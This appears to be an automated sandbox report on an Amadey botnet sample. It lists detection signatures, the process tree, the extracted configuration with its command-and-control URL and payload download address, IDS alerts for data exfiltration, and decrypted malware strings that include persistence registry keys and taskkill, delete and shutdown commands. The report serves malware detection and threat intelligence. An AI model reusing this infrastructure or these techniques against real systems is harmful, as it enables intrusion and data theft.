Edit tour

Windows Analysis Report
Fi3ptS6O8D.exe

Overview

General Information

Sample name:	Fi3ptS6O8D.exe renamed because original name is a hash value
Original sample name:	5d64b7ceda882bda0e8c8384f2edb0668d84b6ddd79ca5d75ca280f761a7cbde.exe
Analysis ID:	1583668
MD5:	37083b063fb068c71cc025f842d985a1
SHA1:	47480faa3a194905f0d5ccd8e0dbe7f50e1884b8
SHA256:	5d64b7ceda882bda0e8c8384f2edb0668d84b6ddd79ca5d75ca280f761a7cbde
Tags:	Amadeyexeuser-zhuzhu0009
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates an undocumented autostart registry key

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found pyInstaller with non standard icon

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

Fi3ptS6O8D.exe (PID: 644 cmdline: "C:\Users\user\Desktop\Fi3ptS6O8D.exe" MD5: 37083B063FB068C71CC025F842D985A1)

skotes.exe (PID: 5536 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 37083B063FB068C71CC025F842D985A1)

skotes.exe (PID: 5780 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 37083B063FB068C71CC025F842D985A1)

skotes.exe (PID: 7116 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 37083B063FB068C71CC025F842D985A1)

rsn.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe" MD5: 26F7294CA7A10C65B44057525A233636)

rsn.exe (PID: 6628 cmdline: "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe" MD5: 26F7294CA7A10C65B44057525A233636)

cmd.exe (PID: 6740 cmdline: cmd.exe /c taskkill.exe /F /IM "nvidia.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5672 cmdline: taskkill.exe /F /IM "nvidia.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 6024 cmdline: cmd.exe /c taskkill.exe /F /IM "svdhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7120 cmdline: taskkill.exe /F /IM "svdhost.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 1212 cmdline: cmd.exe /c taskkill.exe /F /IM "csrr.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1548 cmdline: taskkill.exe /F /IM "csrr.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 5892 cmdline: cmd.exe /c taskkill.exe /F /IM "mnn.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1424 cmdline: taskkill.exe /F /IM "mnn.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 1340 cmdline: cmd.exe /c taskkill.exe /F /IM "mme.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4540 cmdline: taskkill.exe /F /IM "mme.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 7080 cmdline: cmd.exe /c taskkill.exe /F /IM "nnu.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5764 cmdline: taskkill.exe /F /IM "nnu.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 6128 cmdline: cmd.exe /c taskkill.exe /F /IM "lss.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4156 cmdline: taskkill.exe /F /IM "lss.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 4876 cmdline: cmd.exe /c taskkill.exe /F /IM "onn.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 972 cmdline: taskkill.exe /F /IM "onn.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 6896 cmdline: cmd.exe /c taskkill.exe /F /IM "u-eng.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5552 cmdline: taskkill.exe /F /IM "u-eng.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

cmd.exe (PID: 3776 cmdline: cmd.exe /c copy /y "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\41678903251236549780" "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\mpc.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wfhVWWv.exe (PID: 2784 cmdline: "C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe" MD5: E8A21B7C1DBF57E585F28C10631647CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000002.3342429805.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2158787674.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2140865774.0000000000331000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.2.skotes.exe.5f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.5f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.5f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.Fi3ptS6O8D.exe.330000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe,"C:\ProgramData\Samsung\svdhost.exe","C:\Users\user\AppData\Roaming\Fsdisk\Moderax\svdhost.exe","C:\Users\user\AppData\Local\Alexa\Virtual\csrr.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe, ProcessId: 6628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: cmd.exe /c copy /y "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\41678903251236549780" "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\mpc.exe", CommandLine: cmd.exe /c copy /y "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\41678903251236549780" "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\mpc.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe, ParentProcessId: 6628, ParentProcessName: rsn.exe, ProcessCommandLine: cmd.exe /c copy /y "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\41678903251236549780" "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\mpc.exe", ProcessId: 3776, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T09:51:47.969855+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49973	185.215.113.43	80	TCP
2025-01-03T09:52:01.934651+0100	2044696	1	A Network Trojan was detected	192.168.2.6	49976	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T09:51:04.782274+0100	2856147	1	A Network Trojan was detected	192.168.2.6	49970	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T09:51:47.237337+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	49971	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T09:51:48.665384+0100	2803305	3	Unknown Traffic	192.168.2.6	49974	31.41.244.11	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Fi3ptS6O8D.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.43/Zu7JuNko/index.php32	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/5979055508/wfhVWWv.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.phpy	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpnu	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpF	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp

Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Multi AV Scanner detection for submitted file

Source: Fi3ptS6O8D.exe	ReversingLabs: Detection: 65%
Source: Fi3ptS6O8D.exe	Virustotal: Detection: 61%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for sample

Source: Fi3ptS6O8D.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random

Source: Fi3ptS6O8D.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\_win32sysloader.pdb source: rsn.exe, 00000008.00000003.3183647245.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcr90.i386.pdb source: rsn.exe, 00000008.00000003.3186312621.000000000248F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_hashlib.pdb source: rsn.exe, 00000008.00000003.3182583813.0000000002518000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350384939.000000006C2D8000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pythoncom.pdb source: rsn.exe, 00000008.00000003.3187965138.000000000096A000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3187718160.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3348254898.000000001E239000.00000002.00000001.01000000.00000012.sdmp, pythoncom27.dll.8.dr
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb source: rsn.exe, 00000008.00000003.3188140030.000000000094D000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3348586778.000000001E7AD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pythoncom.pdbp% source: rsn.exe, 00000008.00000003.3187965138.000000000096A000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3187718160.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3348254898.000000001E239000.00000002.00000001.01000000.00000012.sdmp, pythoncom27.dll.8.dr
Source:	Binary string: MFCM90.i386.pdb source: rsn.exe, 00000008.00000003.3185061879.0000000000948000.00000004.00000020.00020000.00000000.sdmp, mfcm90.dll.8.dr
Source:	Binary string: C:\build27\cpython\PCBuild\bz2.pdb% source: rsn.exe, 00000008.00000003.3183747902.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183857549.0000000000950000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350703285.000000006C33E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_socket.pdbEi source: rsn.exe, 00000008.00000003.3182684553.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3182774103.000000000094C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3353381081.000000006FB67000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\unicodedata.pdb source: rsn.exe, 00000008.00000003.3189558331.0000000002480000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3349605949.000000006C144000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: MFCM90.i386.pdb0 source: rsn.exe, 00000008.00000003.3185061879.0000000000948000.00000004.00000020.00020000.00000000.sdmp, mfcm90.dll.8.dr
Source:	Binary string: C:\build27\cpython\PCBuild\python27.pdb source: rsn.exe, 00000008.00000003.3187396576.00000000025C6000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3351615382.000000006C6AA000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: mfc90u.i386.pdb source: rsn.exe, 00000008.00000003.3184869887.0000000002518000.00000004.00000020.00020000.00000000.sdmp, mfc90u.dll.8.dr
Source:	Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: _sqlite3.pyd.39.dr
Source:	Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mfc90.i386.pdb source: rsn.exe, 00000008.00000003.3184337790.000000000251A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\bz2.pdb source: rsn.exe, 00000008.00000003.3183747902.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183857549.0000000000950000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350703285.000000006C33E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\select.pdb source: rsn.exe, 00000008.00000003.3188208563.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350092847.000000006C1F3000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_tkinter.pdb source: rsn.exe, 00000008.00000003.3183553595.000000000094C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183465163.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3349409787.000000006C138000.00000002.00000001.01000000.00000017.sdmp, _tkinter.pyd.8.dr
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp90.i386.pdb source: rsn.exe, 00000008.00000003.3185954534.000000000248C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_ctypes.pdb source: rsn.exe, 00000008.00000003.3182252894.0000000000949000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3353195351.000000006E4E0000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: mfc90.i386.pdbpmxt source: rsn.exe, 00000008.00000003.3184337790.000000000251A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\build27\cpython\PCBuild\_socket.pdb source: rsn.exe, 00000008.00000003.3182684553.0000000000948000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3182774103.000000000094C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3353381081.000000006FB67000.00000002.00000001.01000000.0000000D.sdmp
